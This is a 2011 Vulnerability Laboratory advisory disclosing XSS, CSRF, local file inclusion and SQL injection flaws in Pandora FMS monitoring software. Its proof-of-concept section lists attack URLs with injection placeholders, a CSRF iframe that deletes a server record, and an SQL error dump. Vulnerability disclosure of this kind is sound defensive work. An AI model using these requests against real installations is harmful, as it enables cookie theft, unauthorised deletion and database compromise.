Document Title:
===============
Pandora FMS Monitoring 2.1 1.3.x - Multiple Vulnerabilities



Release Date:
=============
2011-07-18


Vulnerability Laboratory ID (VL-ID):
====================================
105


Product & Service Introduction:
===============================
Pandora FMS is a monitoring Open Source software. It watches your systems and applications, and allows you to 
know the status of any element of those systems. Pandora FMS could detect a network interface down, a defacement 
in your website, a memory leak in one of your server application, or the movement of any value of the NASDAQ 
new technology market. 

    * Detect new systems in network.
    * Checks for availability or performance.
    * Raise alerts when something goes wrong.
    * Allow to get data inside systems with its own lite agents (for almost every Operating System).
    * Allow to get data from outside, using only network probes. Including SNMP.
    * Get SNMP Traps from generic network devices. 
    * Generate real time reports and graphics.
    * SLA reporting.
    * User defined graphical views.
    * Store data for months, ready to be used on reporting.
    * Real time graphs for every module. 
    * High availability for each component.
    * Scalable and modular architecture.
    * Supports up to 2500 modules per server.
    * User defined alerts. Also could be used to react on incidents.
    * Integrated incident manager.
    * Integrated DB management: purge and DB compaction. 
    * Multiuser, multi profile, multi group.
    * Event system with user validation for operation in teams.
    * Granularity of accesses and user profiles for each group and each user.
    * Profiles could be personalized using up to eight security attributes without limitation on groups or profiles. 

Pandora FMS runs on any operating system, with specific agents for each platform, gathering data and sending it to a 
server, it has specific agents for GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, and Windows 2000, XP and 2003.



(Copy of the Vendor Homepage: http://pandorafms.org/index.php?sec=project&sec2=home&lang=en)


Abstract Advisory Information:
==============================
Vulnerability Lab Team discovered multiple Vulnerabilities on Pandora FMS Monitoring Software.



Vulnerability Disclosure Timeline:
==================================
2011-06-12:	Vendor Notification
2011-06-13:	Vendor Response/Feedback
2011-06-14:	Vendor Fix/Patch
2011-06-16:	Public or Non-Public Disclosure




Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
1.1
Multiple Input Validation Vulnerabilities are detected on serverside. An attacker is able 
to include own malicious Scriptroutines on server-side (Example;JS). 
Attackers can gather Session-Data (Cookies) of Customers. 
CSRF & XSS Attacks on the server-side are possible.

Pictures:
../extern-site-include.png
../login-fail.png
../webcon.png

1.2
This Vulnerability can be used by restricted Users to delete the Serverlist without permission or restriction (no control!). 
Can be used over restricted customer accounts.

Pictures:
../csrf.png


1.3
The Parameter loads all existing Filename with .php ending. So its possible to load any .php file in the same area with
complete content. The result is a local file-inclusion vulnerability.

Pictures:
../lfi.png


1.3
Potential Attackers can execute SQL-Statements over the Notes attached to incident function of the monitoring application.

Pictures:
../sql-ij.png




Proof of Concept (PoC):
=======================
For demonstration or reproducement purposes ...

1.1a Client-Side - Non Persistent
http://farscape.artica.es/pandora/index.php?keywords=[XSS]&head_search_keywords=abc
http://farscape.artica.es/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=[XSS]
http://farscape.artica.es/pandora/index.php?sec=eventos&sec2=operation/events/events&search=Alert%20fired%20%28Host%20Alive%29&event_type=&
severity=-1&status=0&ev_group=1&refr=5&id_agent=4&id_event=-1&pagination=20&group_rep=0&event_view_hr=1&id_user_ack=0&pure=[XSS!]&offset=160
http://farscape.artica.es/pandora/ajax.php?page=godmode/alerts/alert_templates&get_template_tooltip=[XSS]&id_template=58

1.1b Server-Side - Persistent
http://farscape.artica.es/pandora/index.php?login=
http://farscape.artica.es/pandora/index.php?sec=inventory&sec2=[XSS]
http://farscape.artica.es/pandora/index.php?sec=incidencias&sec2=operation/incidents/incident_detail&id=[XSS]
http://farscape.artica.es/pandora/index.php?sec=dashboard&sec2=enterprise/dashboard/main_dashboard&delete_dashboard=1&id=[XSS]
http://farscape.artica.es/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=[XSS]

Best Link of 1.1 ...
http://farscape.artica.es/pandora/index.php?sec=messages&sec2=operation/messages/message&new_msg=1


1.2
>"<iframe src=http://farscape.artica.es/pandora/index.php?sec=gservers&sec2=godmode/servers/modificar_server&server_del=9&delete=1>


1.3
http://farscape.artica.es/pandora/ajax.php?page=[LFI]&get_template_tooltip=1&id_template=58


1.4
http://farscape.artica.es/pandora/index.php?sec=incidencias&sec2=operation/incidents/incident_detail&insertar_nota=1&id=-x'->[SQL]

--- SQL ERROR ---
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax 
to use near '' at line 1 ('UPDATE tincidencia SET id_lastupdate = 'demo' WHERE id_incidencia IN ()') 
in /var/www/pandora_console/include/functions_incidents.php on line 140




Security Risk:
==============
1.1a
The security risk of the client-side (non-persistent) vulnerabilities are estimated as low.

1.1b
The security risk of the persistent web vulnerabilities are estimated as medium.

1.2
The security risk is estimated as medium.

1.3
The security risk of this vulnerability is estimated as medium.

1.4
The security risk of the sql injection vulnerability is estimated as critical.



Credits & Authors:
==================
Vulnerability Research Laboratory


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory